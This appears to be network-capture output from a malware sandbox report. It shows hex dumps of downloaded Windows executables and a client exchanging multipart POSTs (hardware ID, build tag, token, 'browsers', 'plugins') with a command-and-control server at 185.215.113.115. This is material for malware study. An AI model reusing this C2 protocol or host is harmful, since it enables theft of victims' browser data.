00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 21 Feb 2025 06:18:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 21 Feb 2025 06:18:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 21 Feb 2025 06:18:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 21 Feb 2025 06:18:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 21 Feb 2025 06:18:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCAAAFCBFBAKFHJDBKJHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 44 32 42 32 37 31 32 38 38 41 33 37 38 38 39 35 32 38 38 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 72 65 6e 6f 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 2d 2d 0d 0a Data Ascii: ------DGCAAAFCBFBAKFHJDBKJContent-Disposition: form-data; name="hwid"92D2B271288A3788952882------DGCAAAFCBFBAKFHJDBKJContent-Disposition: form-data; name="build"reno------DGCAAAFCBFBAKFHJDBKJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHCHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 32 32 30 34 62 35 37 38 39 32 39 38 33 32 32 62 34 61 34 63 65 30 66 64 61 33 33 61 30 61 63 38 66 62 30 30 31 64 65 33 66 34 35 30 62 32 36 30 36 34 38 34 38 65 65 39 39 62 64 31 64 66 63 38 65 34 63 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 2d 2d 0d 0a Data Ascii: ------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="token"572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="message"browsers------IDGHDGIDAKEBAAKFCGHC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGDHCGCBKFHJKEBKFBFHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 32 32 30 34 62 35 37 38 39 32 39 38 33 32 32 62 34 61 34 63 65 30 66 64 61 33 33 61 30 61 63 38 66 62 30 30 31 64 65 33 66 34 35 30 62 32 36 30 36 34 38 34 38 65 65 39 39 62 64 31 64 66 63 38 65 34 63 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 2d 2d 0d 0a Data Ascii: ------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="token"572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="message"plugins------HDGDHCGCBKFHJKEBKFBF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECAHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 32 32 30 34 62 35 37 38 39 32 39 38 33 32 32 62 34 61 34 63 65 30 66 64 61 33 33 61 30 61 63 38 66 62 30 30 31 64 65 33 66 34 35 30 62 32 36 30 36 34 38 34 38 65 65 39 39 62 64 31 64 66 63 38 65 34 63 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="token"572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="message"fplugins------EBGIEGCFHCFHIDHIJECA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJHost: 185.215.113.115Content-Length: 5831Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJECGDGCBKECAKFBGCAHost: 185.215.113.115Content-Length: 995Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFCHost: 185.215.113.115Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
